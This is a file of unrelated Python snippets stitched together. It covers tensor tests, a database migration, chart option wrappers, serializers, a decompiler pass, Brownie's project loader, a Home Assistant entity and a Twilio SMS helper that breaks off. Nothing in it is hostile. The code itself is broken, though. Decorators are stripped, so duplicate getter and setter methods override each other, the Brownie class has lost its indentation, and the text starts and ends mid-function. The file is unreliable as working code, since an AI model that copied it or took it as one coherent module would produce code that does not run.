        X2_pt = get_random_torch_tensor([M2, K2], dtype)
        W2_pt = get_random_torch_tensor([N2, K2], dtype)
        B2_pt = get_random_torch_tensor([N2], dtype)
        Input_pt = get_random_torch_tensor([BS, Input_M, Input_N], dtype)
        Y1_orig_pt = torch.nn.functional.linear(X1_pt, W1_pt, bias=B1_pt)
        Y2_orig_pt = torch.nn.functional.linear(X2_pt, W2_pt, bias=B2_pt)
        Y1_pt = torch.reshape(Y1_orig_pt, [BS, (- 1), Input_N])
        Y2_pt = torch.unsqueeze(Y2_orig_pt, dim)
        Y_pt = torch.cat([Y1_pt, Y2_pt, Input_pt], dim=dim)
        y_shape = [var._attrs['values'][0] for var in Y._attrs['shape']]
        _LOGGER.info('AITemplate y_shape: {}'.format(y_shape))
        np.testing.assert_equal(y_shape, Y_pt.size())
        inputs = {'x1': X1_pt, 'w1': W1_pt, 'b1': B1_pt, 'x2': X2_pt, 'w2': W2_pt, 'b2': B2_pt, 'input': Input_pt}
        y = get_torch_empty_tensor(y_shape, dtype)
        module.run_with_tensors(inputs, [y])
        self.assertTrue(torch.allclose(Y_pt, y, atol=0.1, rtol=0.1))
        self.test_count += 1

    def test_strided_reshape_cat(self):
        self._test_strided_reshape_cat()
        self._test_strided_reshape_cat(num_cat_ops=2)
        self._test_strided_reshape_cat_bias()

    # NOTE(review): this looks like a stripped skip decorator (e.g. @unittest.skipIf) — confirm.
    ((detect_target().name() == 'rocm'), 'Not supported by ROCM.')
    def test_strided_reshape_cat_fp32_sm80(self):
        self._test_strided_reshape_cat(num_cat_ops=2, dtype='float')
        self._test_strided_reshape_cat_bias(dtype='float')
def downgrade():
    """Alembic downgrade: drop the payment-method columns from events and its version table."""
    payment_columns = ('pay_onsite', 'pay_by_stripe', 'pay_by_paypal', 'pay_by_cheque', 'pay_by_bank')
    # Drop from the version table first, then the main table (same order as the upgrade's reverse).
    for table_name in ('events_version', 'events'):
        for column_name in payment_columns:
            op.drop_column(table_name, column_name)
class OptionSeriesPieStatesInactive(Options):
    """Generated wrapper for the Highcharts `series.pie.states.inactive` options.

    NOTE(review): getter/setter pairs sharing a name — decorators (likely
    @property / @<name>.setter) appear stripped in this copy; confirm.
    """

    def animation(self) -> 'OptionSeriesPieStatesInactiveAnimation':
        # Nested option object, lazily created on access.
        return self._config_sub_data('animation', OptionSeriesPieStatesInactiveAnimation)

    def enabled(self):
        # Default: inactive state is enabled.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def opacity(self):
        # Default opacity of inactive (non-hovered) slices.
        return self._config_get(0.2)

    def opacity(self, num: float):
        self._config(num, js_type=False)
class VmSerializer(VmBaseSerializer):
    """Read-mostly serializer exposing a VM's identity, placement, resources and state."""

    hostname = s.Field()
    uuid = s.CharField(read_only=True)
    alias = s.Field()
    # Related objects are rendered by a natural key instead of a primary key.
    node = s.SlugRelatedField(slug_field='hostname', read_only=True, required=False)
    owner = s.SlugRelatedField(slug_field='username', read_only=True)
    # Status codes are rendered via their display names.
    status = s.DisplayChoiceField(choices=Vm.STATUS, read_only=True)
    node_status = s.DisplayChoiceField(source='node.status', choices=Node.STATUS_DB, read_only=True)
    vcpus = s.IntegerField(read_only=True)
    ram = s.IntegerField(read_only=True)
    disk = s.IntegerField(read_only=True)
    ips = s.ArrayField(read_only=True)
    # Uptime comes from the computed attribute, not a stored column.
    uptime = s.IntegerField(source='uptime_actual', read_only=True)
    locked = s.BooleanField(read_only=True)
class UnitRenderer(DefaultRenderer):
    """Grid cell renderer that colors cells by whether their text parses as a valid unit."""

    def DrawForeground(self, grid, attr, dc, rect, row, col, isSelected):
        # Text only; the background was already painted by DrawBackground.
        dc.SetBackgroundMode(wx.TRANSPARENT)
        text = grid.model.GetValue(row, col)
        dc.SetFont(self.font)
        dc.DrawText(text, (rect.x + 1), (rect.y + 1))

    def DrawBackground(self, grid, attr, dc, rect, row, col, isSelected):
        # Clip to the cell so the filled rectangle cannot bleed into neighbours.
        dc.SetClippingRegion(rect)
        dc.SetBackgroundMode(wx.SOLID)
        dc.SetPen(wx.Pen(wx.WHITE, 1, wx.SOLID))
        text = grid.model.GetValue(row, col)
        # Brush choice: selection wins; otherwise valid units get the normal
        # brush and unparsable text gets the error brush.
        if isSelected:
            dc.SetBrush(DefaultRenderer.selected_cells)
        elif (unit_parser and unit_parser.parse_unit(text).is_valid()):
            dc.SetBrush(DefaultRenderer.normal_cells)
        else:
            dc.SetBrush(DefaultRenderer.error_cells)
        dc.DrawRectangle(rect.x, rect.y, rect.width, rect.height)
        return
def generate_histogram_plotly(df, col, num_bins, plot_path):
    """Render a histogram of ``df[col]`` to ``plot_path`` and return the HTML fragment.

    Args:
        df: DataFrame-like object supporting ``df[col]``.
        col: Column name to histogram (also used for the plot title).
        num_bins: Maximum number of bins (coerced to int for plotly's ``nbinsx``).
        plot_path: File path the standalone HTML fragment is written to.

    Returns:
        The generated HTML as a string (plotly.js itself is NOT embedded,
        per ``include_plotlyjs=False`` — the page embedding this fragment
        must load plotly.js separately).
    """
    import plotly.graph_objs as go
    import plotly
    import codecs
    trace = go.Histogram(x=df[col], nbinsx=int(num_bins))
    data = [trace]
    layout = {'title': (col.capitalize() + ' Histogram')}
    fig = go.Figure(data=data, layout=layout)
    plotly.offline.plot(fig, filename=plot_path, show_link=False, auto_open=False, include_plotlyjs=False)
    # Fix: read back with an explicit encoding. Plotly writes UTF-8; relying on the
    # platform default (e.g. cp1252 on Windows) could corrupt or fail the read.
    with codecs.open(plot_path, 'r', encoding='utf-8') as plot_file:
        html = plot_file.read()
    return html
def test_chat_id_str_conversion():
    """Chat IDs must round-trip through chat_id_to_str / chat_id_str_to_id."""
    channel_id = '__channel_id__'
    chat_id = '__chat_id__'
    group_id = '__group_id__'
    packed = chat_id_to_str(channel_id=channel_id, chat_uid=chat_id)
    assert chat_id_str_to_id(packed) == (channel_id, chat_id, None), 'Converting channel-chat ID without group ID'
    packed_grouped = chat_id_to_str(channel_id=channel_id, chat_uid=chat_id, group_id=group_id)
    assert chat_id_str_to_id(packed_grouped) == (channel_id, chat_id, group_id), 'Converting channel-chat ID with group ID'
# NOTE(review): this bare keyword tuple is presumably a stripped hypothesis
# "@given(...)" decorator supplying the strategies — confirm against the original.
(private_key_bytes=private_key_st, message_hash=message_hash_st)
def test_signatures_with_high_s(key_api, private_key_bytes, message_hash):
    """A signature with its s-value flipped to the high half-order must still verify.

    ECDSA signatures are malleable: (r, s) and (r, N - s) are both valid, so
    implementations canonicalize to the low-s form; verification must accept either.
    """
    private_key = key_api.PrivateKey(private_key_bytes)
    low_s_signature = private_key.sign_msg_hash(message_hash)
    # sign_msg_hash already emits the canonical low-s form.
    assert (coerce_low_s(low_s_signature.s) == low_s_signature.s)
    # N - s (mod N) is the equivalent high-s value of the same signature.
    high_s = ((- low_s_signature.s) % SECPK1_N)
    assert (coerce_low_s(high_s) == low_s_signature.s)
    high_s_signature = key_api.Signature(vrs=(low_s_signature.v, low_s_signature.r, high_s))
    assert key_api.ecdsa_verify(message_hash, high_s_signature, private_key.public_key)
class PhiFunctionLifter():
    """Lifts Phi-functions out of SSA: replaces them with plain assignments on incoming edges.

    For each basic block with Phi-functions, the corresponding assignments are appended to
    each predecessor (or placed in a freshly inserted block when the edge is conditional),
    and the interference graph is updated for the newly introduced copies.
    """

    def __init__(self, cfg: ControlFlowGraph, interference_graph: InterferenceGraph, phi_functions: DefaultDict[(BasicBlock, List[Phi])]):
        self._cfg = cfg
        self.interference_graph = interference_graph
        # Phi-functions grouped by the block that contains them; assumed to be in a
        # liftable order (see the error raised in _compute_instructions_for).
        self._phi_functions_of: DefaultDict[(BasicBlock, List[Phi])] = phi_functions

    def lift(self) -> None:
        """Lift and then delete the Phi-functions of every block."""
        for basic_block in self._phi_functions_of:
            self._lift_phi_functions_of(basic_block)
            self._remove_phi_instructions_of(basic_block)

    def _lift_phi_functions_of(self, basic_block: BasicBlock) -> None:
        """Materialize this block's Phi-functions as assignments on each incoming edge."""
        for predecessor in self._get_predecessors(basic_block):
            new_instructions: List[Assignment] = self._compute_instructions_for(predecessor, basic_block)
            if (not new_instructions):
                continue
            edge = self._cfg.get_edge(predecessor, basic_block)
            if ((predecessor is not None) and isinstance(edge, UnconditionalEdge)):
                # Safe to append directly: the predecessor falls through only to us.
                predecessor.instructions.extend(new_instructions)
            else:
                # Conditional edge (or the synthetic entry, predecessor None):
                # split the edge with a new block holding the copies.
                new_basic_block = self._insert_basic_block_before(basic_block, new_instructions)
                if predecessor:
                    self._cfg.substitute_edge(edge, edge.copy(sink=new_basic_block))
                else:
                    # No predecessor: the new block becomes the CFG entry.
                    self._cfg.root = new_basic_block
            self._update_interference_graph_after_lifting(new_instructions)

    def _get_predecessors(self, basic_block: BasicBlock) -> Iterator[Optional[BasicBlock]]:
        """Yield CFG predecessors, plus None when a Phi has an undefined (entry) origin."""
        (yield from list(self._cfg.get_predecessors(basic_block)))
        if (self._phi_functions_of[basic_block] and (None in self._phi_functions_of[basic_block][0].origin_block)):
            (yield None)

    def _insert_basic_block_before(self, basic_block: BasicBlock, new_instructions: List[Assignment]) -> BasicBlock:
        """Create a new block with `new_instructions` that falls through into `basic_block`."""
        new_basic_block = self._cfg.create_block(new_instructions)
        self._cfg.add_edge(UnconditionalEdge(new_basic_block, basic_block))
        return new_basic_block

    def _update_interference_graph_after_lifting(self, new_instructions: List[Assignment]) -> None:
        """Record that each copied-from variable interferes with earlier copy targets.

        A variable read by instruction k is still live across the definitions made by
        instructions 0..k-1, so it interferes with each of those targets.
        """
        assigned_variables = [instruction.destination for instruction in new_instructions[:(- 1)]]
        for (number, instruction) in enumerate(new_instructions):
            if isinstance(instruction.value, Variable):
                for index in range(number):
                    self.interference_graph.add_edge(assigned_variables[index], instruction.value)

    def _compute_instructions_for(self, predecessor: Optional[BasicBlock], basic_block: BasicBlock) -> List[Assignment]:
        """Return the copy assignments this edge needs, constant copies last.

        Raises:
            ValueError: if a Phi-function reads a value defined by an earlier Phi of the
                same block — that ordering cannot be lifted as sequential copies.
        """
        new_instructions = list()
        constant_assignments = list()
        defined_variables = set()
        for phi_inst in self._phi_functions_of[basic_block]:
            definition = phi_inst.definitions[0]
            value = phi_inst.origin_block[predecessor]
            if (value in defined_variables):
                error_message = f'the phi-function {phi_inst} uses value {value} which is defined by a previous Phi-function of the same basic block, therefore, lifting the Phi-functions in this order {self._phi_functions_of[basic_block]} is not correct.'
                logging.error(error_message)
                raise ValueError(error_message)
            defined_variables.add(definition)
            if (definition != value):
                if isinstance(value, Constant):
                    # Constant loads cannot clobber a variable another copy still reads,
                    # so they are deferred to the end.
                    constant_assignments.append(Assignment(definition, value))
                else:
                    new_instructions.append(Assignment(definition, value))
        return (new_instructions + constant_assignments)

    def _remove_phi_instructions_of(self, basic_block: BasicBlock) -> None:
        """Delete the now-lifted Phi-functions from the block itself."""
        for phi_inst in self._phi_functions_of[basic_block]:
            basic_block.remove_instruction(phi_inst)
class NotebookImportExtractor(ImportExtractor):
    """Extracts import statements from the code cells of a Jupyter notebook.

    NOTE(review): several helpers take ``cls`` or no self — @classmethod/@staticmethod
    decorators appear stripped in this copy; confirm against the original.
    """

    def extract_imports(self) -> dict[(str, list[Location])]:
        """Parse all import lines found in the notebook's code cells into module->locations."""
        notebook = self._read_ipynb_file(self.file)
        if (not notebook):
            return {}
        cells = self._keep_code_cells(notebook)
        import_statements = [self._extract_import_statements_from_cell(cell) for cell in cells]
        # Join all import lines into one synthetic module and reuse the AST-based extractor.
        # NOTE: line numbers in the resulting Locations refer to this synthetic module,
        # not to notebook cell positions.
        tree = ast.parse('\n'.join(itertools.chain.from_iterable(import_statements)), str(self.file))
        return self._extract_imports_from_ast(tree)

    def _read_ipynb_file(cls, path_to_ipynb: Path) -> (dict[(str, Any)] | None):
        """Load the notebook JSON; retry with a detected encoding, or return None on failure."""
        try:
            with path_to_ipynb.open() as ipynb_file:
                notebook: dict[(str, Any)] = json.load(ipynb_file)
        except ValueError:
            # First attempt failed (decode or JSON error): retry with the detected
            # encoding and relaxed JSON parsing.
            try:
                with path_to_ipynb.open(encoding=cls._get_file_encoding(path_to_ipynb)) as ipynb_file:
                    notebook = json.load(ipynb_file, strict=False)
            except UnicodeDecodeError:
                logging.warning('Warning: File %s could not be decoded. Skipping...', path_to_ipynb)
                return None
        return notebook

    def _keep_code_cells(notebook: dict[(str, Any)]) -> list[dict[(str, Any)]]:
        # Markdown/raw cells cannot contain imports.
        return [cell for cell in notebook['cells'] if (cell['cell_type'] == 'code')]

    def _contains_import_statements(line: str) -> bool:
        # Cheap textual pre-filter; the real parsing happens in ast.parse above.
        return (re.search('^(?:from\\s+(\\w+)(?:\\.\\w+)?\\s+)?import\\s+([^\\s,.]+)(?:\\.\\w+)?', line) is not None)

    def _extract_import_statements_from_cell(cls, cell: dict[(str, Any)]) -> list[str]:
        return [line for line in cell['source'] if cls._contains_import_statements(line)]
class FrameHeader():
    """Fixed-layout frame header: size, payload type, frame id, plus reserved padding."""

    def read_header(cls, fp: IOWrapper) -> FrameHeader:
        """Read one header from the stream in wire order and return a FrameHeader.

        NOTE(review): takes ``cls`` — presumably a stripped @classmethod; confirm.
        """
        size = fp.read_short('header.size')
        payload_type = fp.read_byte('header.payload_type')
        # Reserved fields are read to advance the stream but intentionally discarded.
        reserved1 = fp.read_byte('header.reserved1')
        frame_id = fp.read_long('header.id')
        reserved2 = fp.read_bytes(8, 'header.reserved2')
        return cls(size, payload_type, frame_id)

    def __init__(self, size: int=None, payload_type: int=None, frame_id: int=None):
        # All fields optional; defaults of None mark an uninitialized header.
        self.size = size
        self.payload_type = payload_type
        self.id = frame_id
class Project(_ProjectBase):
def __init__(self, name: str, project_path: Path) -> None:
self._path: Path = project_path
self._envvars = _load_project_envvars(project_path)
self._structure = expand_posix_vars(_load_project_structure_config(project_path), self._envvars)
self._build_path: Path = project_path.joinpath(self._structure['build'])
self._name = name
self._active = False
self.load()
def load(self, raise_if_loaded: bool=True) -> None:
if self._active:
if raise_if_loaded:
raise ProjectAlreadyLoaded('Project is already active')
return None
contract_sources = _load_sources(self._path, self._structure['contracts'], False)
interface_sources = _load_sources(self._path, self._structure['interfaces'], True)
self._sources = Sources(contract_sources, interface_sources)
self._build = Build(self._sources)
contract_list = self._sources.get_contract_list()
potential_dependencies = []
for path in list(self._build_path.glob('contracts/*.json')):
try:
with path.open() as fp:
build_json = json.load(fp)
except json.JSONDecodeError:
build_json = {}
if (not set(BUILD_KEYS).issubset(build_json)):
path.unlink()
continue
if (path.stem not in contract_list):
potential_dependencies.append((path, build_json))
continue
if isinstance(build_json['allSourcePaths'], list):
path.unlink()
test_path = self._build_path.joinpath('tests.json')
if test_path.exists():
test_path.unlink()
continue
if (not self._path.joinpath(build_json['sourcePath']).exists()):
path.unlink()
continue
self._build._add_contract(build_json)
for (path, build_json) in potential_dependencies:
dependents = self._build.get_dependents(path.stem)
is_dependency = (len((set(dependents) & set(contract_list))) > 0)
if is_dependency:
self._build._add_contract(build_json)
else:
path.unlink()
interface_hashes = {}
interface_list = self._sources.get_interface_list()
for path in list(self._build_path.glob('interfaces/*.json')):
try:
with path.open() as fp:
build_json = json.load(fp)
except json.JSONDecodeError:
build_json = {}
if ((not set(INTERFACE_KEYS).issubset(build_json)) or (path.stem not in interface_list)):
path.unlink()
continue
self._build._add_interface(build_json)
interface_hashes[path.stem] = build_json['sha1']
self._compiler_config = expand_posix_vars(_load_project_compiler_config(self._path), self._envvars)
changed = self._get_changed_contracts(interface_hashes)
self._compile(changed, self._compiler_config, False)
self._compile_interfaces(interface_hashes)
self._load_dependency_artifacts()
self._create_containers()
self._load_deployments()
name = self._name
self.__all__ = (list(self._containers) + ['interface'])
sys.modules[f'brownie.project.{name}'] = self
sys.modules['brownie.project'].__dict__[name] = self
sys.modules['brownie.project'].__all__.append(name)
sys.modules['brownie.project'].__console_dir__.append(name)
self._namespaces = [sys.modules['__main__'].__dict__, sys.modules['brownie.project'].__dict__]
_revert_register(self)
self._active = True
_loaded_projects.append(self)
def _get_changed_contracts(self, compiled_hashes: Dict) -> Dict:
new_hashes = self._sources.get_interface_hashes()
for name in [k for (k, v) in new_hashes.items() if (compiled_hashes.get(k, None) != v)]:
self._build._remove_interface(name)
contracts = set((i for i in self._sources.get_contract_list() if self._compare_build_json(i)))
for contract_name in list(contracts):
contracts.update(self._build.get_dependents(contract_name))
for name in contracts:
self._build._remove_contract(name)
changed_set: Set = set((self._sources.get_source_path(i) for i in contracts))
return {i: self._sources.get(i) for i in changed_set}
def _compare_build_json(self, contract_name: str) -> bool:
config = self._compiler_config
try:
source = self._sources.get(contract_name)
build_json = self._build.get(contract_name)
except KeyError:
return True
if (build_json['sha1'] != sha1(source.encode()).hexdigest()):
return True
if (build_json['language'] == 'Solidity'):
solc_config = config['solc'].copy()
solc_config['remappings'] = None
if (not _solidity_compiler_equal(solc_config, build_json['compiler'])):
return True
if (Version(build_json['compiler']['version']) not in get_pragma_spec(source)):
return True
else:
vyper_config = config['vyper'].copy()
if (not _vyper_compiler_equal(vyper_config, build_json['compiler'])):
return True
return False
def _compile_interfaces(self, compiled_hashes: Dict) -> None:
new_hashes = self._sources.get_interface_hashes()
changed_paths = [self._sources.get_source_path(k, True) for (k, v) in new_hashes.items() if (compiled_hashes.get(k, None) != v)]
if (not changed_paths):
return
print('Generating interface ABIs...')
changed_sources = {i: self._sources.get(i) for i in changed_paths}
abi_json = compiler.get_abi(changed_sources, solc_version=self._compiler_config['solc'].get('version', None), allow_paths=self._path.as_posix(), remappings=self._compiler_config['solc'].get('remappings', []))
for (name, abi) in abi_json.items():
with self._build_path.joinpath(f'interfaces/{name}.json').open('w') as fp:
json.dump(abi, fp, sort_keys=True, indent=2, default=sorted)
self._build._add_interface(abi)
def _load_dependency_artifacts(self) -> None:
dep_build_path = self._build_path.joinpath('contracts/dependencies/')
for path in list(dep_build_path.glob('**/*.json')):
contract_alias = path.relative_to(dep_build_path).with_suffix('').as_posix()
if self._build.get_dependents(contract_alias):
with path.open() as fp:
build_json = json.load(fp)
self._build._add_contract(build_json, contract_alias)
else:
path.unlink()
def _load_deployments(self) -> None:
if ((CONFIG.network_type != 'live') and (not CONFIG.settings['dev_deployment_artifacts'])):
return
chainid = (CONFIG.active_network['chainid'] if (CONFIG.network_type == 'live') else 'dev')
path = self._build_path.joinpath(f'deployments/{chainid}')
path.mkdir(exist_ok=True)
deployments = list(path.glob('*.json'))
deployments.sort(key=(lambda k: k.stat().st_mtime))
deployment_map = self._load_deployment_map()
for build_json in deployments:
with build_json.open() as fp:
build = json.load(fp)
contract_name = build['contractName']
if (contract_name not in self._containers):
build_json.unlink()
continue
if ('pcMap' in build):
contract = ProjectContract(self, build, build_json.stem)
else:
contract = Contract.from_abi(contract_name, build_json.stem, build['abi'])
contract._project = self
container = self._containers[contract_name]
_add_contract(contract)
container._contracts.append(contract)
instances = deployment_map.setdefault(chainid, {}).setdefault(contract_name, [])
if (build_json.stem in instances):
instances.remove(build_json.stem)
instances.insert(0, build_json.stem)
self._save_deployment_map(deployment_map)
def _load_deployment_map(self) -> Dict:
    """Return the persisted deployment map, or an empty dict if none exists."""
    map_path = self._build_path.joinpath('deployments/map.json')
    if not map_path.exists():
        return {}
    with map_path.open('r') as fp:
        return json.load(fp)
def _save_deployment_map(self, deployment_map: Dict) -> None:
    """Persist the deployment map to ``deployments/map.json``."""
    map_path = self._build_path.joinpath('deployments/map.json')
    with map_path.open('w') as fp:
        json.dump(deployment_map, fp, sort_keys=True, indent=2, default=sorted)
def _remove_from_deployment_map(self, contract: ProjectContract) -> None:
    """Delete `contract`'s address from the persisted deployment map.

    Empty per-contract and per-chain entries are pruned afterwards.
    """
    if CONFIG.network_type != 'live' and not CONFIG.settings['dev_deployment_artifacts']:
        return
    chainid = CONFIG.active_network['chainid'] if CONFIG.network_type == 'live' else 'dev'
    deployment_map = self._load_deployment_map()
    try:
        instances = deployment_map[chainid][contract._name]
        instances.remove(contract.address)
        if not instances:
            del deployment_map[chainid][contract._name]
        if not deployment_map[chainid]:
            del deployment_map[chainid]
    except (KeyError, ValueError):
        # address or name was never recorded - nothing to remove
        pass
    self._save_deployment_map(deployment_map)
def _add_to_deployment_map(self, contract: ProjectContract) -> None:
    """Record `contract` as the most recent deployment for its chain."""
    if CONFIG.network_type != 'live' and not CONFIG.settings['dev_deployment_artifacts']:
        return
    chainid = CONFIG.active_network['chainid'] if CONFIG.network_type == 'live' else 'dev'
    deployment_map = self._load_deployment_map()
    try:
        # drop any stale entry so the address is not listed twice
        deployment_map[chainid][contract._name].remove(contract.address)
    except (ValueError, KeyError):
        pass
    entries = deployment_map.setdefault(chainid, {}).setdefault(contract._name, [])
    entries.insert(0, contract.address)
    self._save_deployment_map(deployment_map)
def _update_and_register(self, dict_: Any) -> None:
    """Copy this project's members into `dict_` and track it for later updates."""
    dict_.update(self)
    if 'interface' not in dict_:
        dict_['interface'] = self.interface
    # remember the namespace so closing the project can strip it again
    self._namespaces.append(dict_)
def _add_to_main_namespace(self) -> None:
    """Expose this project's containers (and `interface`) in the top-level `brownie` module."""
    brownie: Any = sys.modules['brownie']
    main_dict = brownie.__dict__
    if 'interface' not in main_dict:
        main_dict['interface'] = self.interface
    main_dict.update(self._containers)
    brownie.__all__.extend(self.__all__)
def _remove_from_main_namespace(self) -> None:
    """Strip this project's names back out of the top-level `brownie` module."""
    brownie: Any = sys.modules['brownie']
    main_dict = brownie.__dict__
    # only remove `interface` if it is still ours
    if main_dict.get('interface') == self.interface:
        del main_dict['interface']
    for name in self._containers:
        main_dict.pop(name, None)
    for name in self.__all__:
        if name in brownie.__all__:
            brownie.__all__.remove(name)
def __repr__(self) -> str:
    """Debug representation including the project name."""
    return "<Project '{}'>".format(self._name)
def load_config(self) -> None:
    """Reload the project's configuration file, if the project has a real path."""
    if not isinstance(self._path, Path):
        return
    _load_project_config(self._path)
def close(self, raises: bool=True) -> None:
    """Remove the project and all its objects from every namespace.

    Args:
        raises: when True, raise ProjectNotFound if the project is not
            currently loaded; when False, return silently instead.
    """
    if (not self._active):
        if (not raises):
            return
        raise ProjectNotFound('Project is not currently loaded.')
    # strip the project's exported names from each registered namespace
    for dict_ in self._namespaces:
        for key in [k for (k, v) in dict_.items() if ((v == self) or ((k in self) and (v == self[k])))]:
            del dict_[key]
    # deregister every deployed contract instance
    for contract in [x for v in self._containers.values() for x in v._contracts]:
        _remove_contract(contract)
    for container in self._containers.values():
        container._contracts.clear()
    self._containers.clear()
    self._remove_from_main_namespace()
    # drop the dynamically created `brownie.project.<name>` module
    name = self._name
    del sys.modules[f'brownie.project.{name}']
    sys.modules['brownie.project'].__all__.remove(name)
    sys.modules['brownie.project'].__console_dir__.remove(name)
    self._active = False
    _loaded_projects.remove(self)
    try:
        sys.path.remove(str(self._path))
    except ValueError:
        # path was never added (or already removed) - ignore
        pass
def _clear_dev_deployments(self, height: int) -> None:
    """Delete dev-network deployment artifacts above block `height`.

    A height of 0 clears everything, including the dev folder itself and
    the 'dev' entry in the persisted deployment map.
    """
    path = self._build_path.joinpath('deployments/dev')
    if path.exists():
        deployment_map = self._load_deployment_map()
        for deployment in path.glob('*.json'):
            if (height == 0):
                deployment.unlink()
            else:
                with deployment.open('r') as fp:
                    deployment_artifact = json.load(fp)
                block_height = deployment_artifact['deployment']['blockHeight']
                address = deployment_artifact['deployment']['address']
                contract_name = deployment_artifact['contractName']
                # deployed after the rollback point - discard it
                if (block_height > height):
                    deployment.unlink()
                    try:
                        deployment_map['dev'][contract_name].remove(address)
                    except (KeyError, ValueError):
                        pass
        if (('dev' in deployment_map) and ((height == 0) or (not deployment_map['dev']))):
            del deployment_map['dev']
            # nothing left for dev - remove the whole folder
            shutil.rmtree(path)
        self._save_deployment_map(deployment_map)
def _revert(self, height: int) -> None:
    # chain was reverted to `height`; discard dev deployments made above it
    self._clear_dev_deployments(height)
def _reset(self) -> None:
    # chain was reset; height 0 clears every dev deployment artifact
    self._clear_dev_deployments(0)
def add_tile_arguments(parser: argparse.ArgumentParser) -> None:
    """Register the tile-selection command-line options on `parser`."""
    add = parser.add_argument
    add('-c', '--coordinates', metavar='<latitude>,<longitude>',
        help='coordinates of any location inside the tile')
    add('-t', '--tile', metavar='<zoom level>/<x>/<y>', help='tile specification')
    add('--cache', default='cache', metavar='<path>', help='path for temporary OSM files')
    add('-b', '--boundary-box', metavar='<lon1>,<lat1>,<lon2>,<lat2>',
        help='construct the minimum amount of tiles that cover the requested boundary box')
    add('-z', '--zoom', type=str, default='18', metavar='<range>',
        help='OSM zoom levels; can be list of numbers or ranges, e.g. `16-18`, `16,17,18`, or `16,18-20`')
    add('-i', '--input', dest='input_file_name', metavar='<path>',
        help='input OSM XML file name (if not specified, the file will be downloaded using the OpenStreetMap API)')
def test_affine_index_range7():
    """Check index_range_analysis bounds for an affine loop extent with symbols.

    NOTE(review): `bar` uses the Exo DSL (`size`, `seq`); a `@proc` decorator
    appears to have been stripped from this listing - confirm against upstream.
    """
    def bar(N: size):
        assert (N >= 1)
        assert (N <= 5)
        for i in seq(0, 6):
            for j in seq(0, (((- 3) + ((i + 2) * 5)) - N)):
                pass
    # hi() is the extent expression: -3 + (i+2)*5 - N; with i in [0,5] and
    # N in [1,5] it ranges from -3+10-5 = 2 up to -3+35-1 = 31
    e = bar.find('for j in _:_').hi()._impl._node
    i_sym = bar.find('for i in _:_')._impl._node.iter
    N_sym = bar._loopir_proc.args[0].name
    e_range = index_range_analysis(e, {i_sym: (0, 5), N_sym: (1, 5)})
    assert (e_range == (2, 31))
class VelhopStation(BikeShareStation):
    """A single Velhop (Strasbourg) station parsed from one feed record."""

    def __init__(self, data):
        super(VelhopStation, self).__init__()
        coords = data['coordonnees']
        is_renting = int(data['is_renting']) == 1
        is_returning = int(data['is_returning']) == 1
        self.name = data['na']
        self.latitude = float(coords['lat'])
        self.longitude = float(coords['lon'])
        self.bikes = int(data['av'])
        self.free = int(data['fr'])
        self.extra = {
            'uid': data['id'],
            'slots': int(data['to']),
            'renting': is_renting,
            'returning': is_returning,
            # a station is online only when it both rents and accepts returns
            'online': is_renting and is_returning,
            'last_update': data['last_reported'],
        }
class SettingsSelect(InteractiveEntityBase, SelectEntity):
    """Select entity exposing a Home Connect appliance setting with a fixed set
    of allowed values.

    NOTE(review): accessors such as device_class/options/current_option are
    conventionally ``@property`` methods on Home Assistant entities; decorators
    appear to have been stripped from this listing - confirm against upstream.
    """
    def device_class(self) -> str:
        return f'{DOMAIN}__settings'
    def translation_key(self) -> str:
        return 'settings'
    def name_ext(self) -> (str | None):
        # prefer the human-readable name reported by the appliance, if any
        if ((self._key in self._appliance.settings) and self._appliance.settings[self._key].name):
            return self._appliance.settings[self._key].name
        return None
    def icon(self) -> str:
        return self.get_entity_setting('icon', 'mdi:tune')
    def available(self) -> bool:
        # unavailable while the appliance reports remote control as disabled
        return (super().available and (('BSH.Common.Status.RemoteControlActive' not in self._appliance.status) or self._appliance.status['BSH.Common.Status.RemoteControlActive'].value))
    def options(self) -> list[str]:
        try:
            return self._appliance.settings[self._key].allowedvalues
        except Exception as ex:
            # best effort: the setting may not be available yet
            pass
        return []
    def current_option(self) -> str:
        return self._appliance.settings[self._key].value
    async def async_select_option(self, option: str) -> None:
        try:
            (await self._appliance.async_apply_setting(self._key, option))
        except HomeConnectError as ex:
            if ex.error_description:
                raise HomeAssistantError(f'Failed to apply the setting: {ex.error_description} ({ex.code})')
            raise HomeAssistantError(f'Failed to apply the setting: ({ex.code})')
    async def async_on_update(self, appliance: Appliance, key: str, value) -> None:
        # state is derived from self._appliance; just push a refresh
        self.async_write_ha_state()
def extractDawninfinityBlogspotCom(item):
    """Parse a release message for 'Dawn Infinity' feed items.

    Returns None for previews or items without vol/chapter info, a release
    message for known tags, and False when no tag matches.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    tagmap = [
        ('Dawn Infinity', 'Dawn Infinity', 'oel'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tag, series, tl_type in tagmap:
        if tag not in item['tags']:
            continue
        return buildReleaseMessageWithType(item, series, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class ForLoopNodeSerializer(LoopNodeSerializer):
    """(De)serializes ForLoopNode objects, adding declaration/modification fields."""

    def serialize(self, node: ForLoopNode) -> Dict:
        """Serialize `node`, extending the base loop fields."""
        data = super().serialize(node)
        data['declaration'] = self._pseudo.serialize(node.declaration)
        data['modification'] = self._pseudo.serialize(node.modification)
        return data

    def deserialize(self, data: dict) -> ForLoopNode:
        """Rebuild a ForLoopNode from `data`."""
        # note: new_context is read once per condition, matching two fresh contexts
        return ForLoopNode(
            declaration=self._pseudo.deserialize(data['declaration']),
            condition=LogicCondition.deserialize(data['condition'], self._group.new_context),
            modification=self._pseudo.deserialize(data['modification']),
            reaching_condition=LogicCondition.deserialize(data['rc'], self._group.new_context),
        )
def _twilio_sms_dispatcher(messaging_config: MessagingConfig, message: str, to: Optional[str]) -> None:
    """Send `message` as an SMS through Twilio.

    Args:
        messaging_config: config whose secrets hold the Twilio credentials.
        message: body text to send.
        to: recipient phone number.

    Raises:
        MessageDispatchException: if the recipient, secrets, or sender identity
            is missing, or if the Twilio API call fails.
    """
    if not to:
        logger.error('Message failed to send. No phone identity supplied.')
        raise MessageDispatchException('No phone identity supplied.')
    if messaging_config.secrets is None:
        logger.error('Message failed to send. No config secrets supplied.')
        raise MessageDispatchException('No config secrets supplied.')
    account_sid = messaging_config.secrets[MessagingServiceSecrets.TWILIO_ACCOUNT_SID.value]
